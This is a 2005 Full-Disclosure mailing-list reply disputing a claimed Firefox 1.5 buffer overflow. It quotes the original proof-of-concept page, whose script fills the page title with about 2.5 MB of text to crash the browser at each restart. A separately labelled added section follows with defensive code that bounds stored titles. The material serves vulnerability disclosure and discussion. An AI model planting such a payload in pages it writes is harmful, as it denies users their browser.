
List:       full-disclosure
Subject:    [Full-disclosure] re: Firefox 1.5 buffer overflow (poc)
From:       "ad () heapoverflow ! com" <ad () heapoverflow ! com>
Date:       2005-12-08 13:37:42
Message-ID: 43983726.9060804 () heapoverflow ! com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Neither a fake, nor do you really know what a buffer overflow is, but for
sure here on my Firefox 1.5 EN, the client takes much longer to load at
the next boot, but it reloads fine without exceptions and there is
nothing about a security bug here...


><!-- Firefox 1.5 buffer overflow
>
>Basically Firefox logs all kinds of URL data in its history.dat file.
>This little script will set a really large topic and Firefox will then
>save that topic into its history.dat. The next time that Firefox is
>opened, it will instantly crash due to a buffer overflow -- this will
>happen every time until you manually delete the history.dat file -- which
>most users won't figure out.
>
>This proof of concept will only prevent someone from reopening
>their browser after being exploited. DoS if you will. However, code
>execution is possible with some modifications.
>
>Tested with Firefox 1.5 on Windows XP SP2.
>
>ZIPLOCK <sickbeatz@gmail.com>
>
>-->
><html><head><title>heh</title><script type="text/javascript">
>// Build a 5000-character block, then append it 500 more times, so the
>// title ends up 2,505,000 characters (about 2.5 MB) long. The post's claim
>// is that Firefox persists document.title into history.dat and re-reads
>// it at the next start.
>function ex() {
>	var buffer = "";
>	for (var i = 0; i < 5000; i++) {
>		buffer += "A";
>	}
>	var buffer2 = buffer;
>	for (i = 0; i < 500; i++) {
>		buffer2 += buffer;
>	}
>	document.title = buffer2;	// written to history.dat on exit
>}
></script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
></a></body></html>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
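As an added example, not part of the original post and not ZIPLOCK's or Mozilla's code: the size of the title the quoted script produces, and the kind of bound a history store should enforce on a page title before persisting it. `buildPocTitle` repeats the construction from `ex()`; `UnboundedHistoryStore`, `BoundedHistoryStore` and `MAX_TITLE_LEN` are hypothetical names for the illustration and say nothing about how Firefox's history.dat is actually written. The point the thread turns on is that `document.title` is attacker-controlled, is written to disk and is read back at every start, so any length limit has to be applied at write time, not only when the title is displayed.

```javascript
// Added example (hypothetical store, not Firefox code): the PoC payload size and
// a bounded history store beside the unbounded one.

// Same construction as the quoted ex(): a 5000-character block appended
// 500 more times, i.e. chunk * (repeats + 1) characters in total.
function buildPocTitle(chunk = 5000, repeats = 500) {
  const buffer = "A".repeat(chunk);
  let buffer2 = buffer;
  for (let i = 0; i < repeats; i++) buffer2 += buffer;
  return buffer2; // 2,505,000 characters for the defaults
}

// Illustrative limit (assumption); a real store would pick its own value.
const MAX_TITLE_LEN = 4096;

// Unsafe variant: the title is taken from the page as given and persisted
// verbatim, so a hostile page controls how much is written and re-read.
class UnboundedHistoryStore {
  constructor() { this.entries = []; }
  record(url, title) { this.entries.push({ url: url, title: title }); }
  serialize() { return JSON.stringify(this.entries); }
}

// Hardened variant: validate and truncate at write time, because whatever is
// stored here is parsed again on every startup before the user can intervene.
class BoundedHistoryStore extends UnboundedHistoryStore {
  record(url, title) {
    if (typeof title !== "string") title = "";
    if (title.length > MAX_TITLE_LEN) title = title.slice(0, MAX_TITLE_LEN);
    super.record(url, title);
  }
}

// Runs both stores against the PoC title and reports the sizes involved.
function demo() {
  const title = buildPocTitle();
  const unsafe = new UnboundedHistoryStore();
  const safe = new BoundedHistoryStore();
  const url = "http://example.invalid/heh"; // constructed sample URL
  unsafe.record(url, title);
  safe.record(url, title);
  return {
    payloadLength: title.length,                       // 2505000
    unsafeSerializedLength: unsafe.serialize().length, // > 2505000: whole payload on disk
    safeTitleLength: safe.entries[0].title.length,     // 4096: capped before write
  };
}
```

Read together with the reply above: the disagreement in the thread is about whether the crash is a memory-safety bug or just a slow reload, but either way the defensive property is the same, a persisted, attacker-chosen value must be bounded before it is written.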